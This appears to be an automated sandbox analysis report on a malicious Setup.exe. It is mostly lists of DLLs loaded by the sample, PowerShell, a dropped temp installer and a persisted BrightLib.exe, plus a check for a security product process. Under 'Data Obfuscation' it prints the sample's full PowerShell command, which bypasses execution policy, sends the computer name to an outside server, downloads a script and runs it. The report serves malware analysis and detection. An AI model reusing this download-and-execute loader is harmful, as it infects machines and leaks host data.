              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: sfc.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: explorerframe.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: dlnashext.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: wpdshext.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: edputil.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: appresolver.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: slc.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: sppc.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
              Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Section loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp Window found: window name: TMainForm
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: Setup.exe Static file information: File size 1543377 > 1048576
              Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2478739178.00000000386C0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453154632.000000000367D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2478739178.00000000386C0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453154632.000000000367D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1931860240.0000000007926000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe.0.dr Static PE information: real checksum: 0x9307ce should be: 0x8615ed
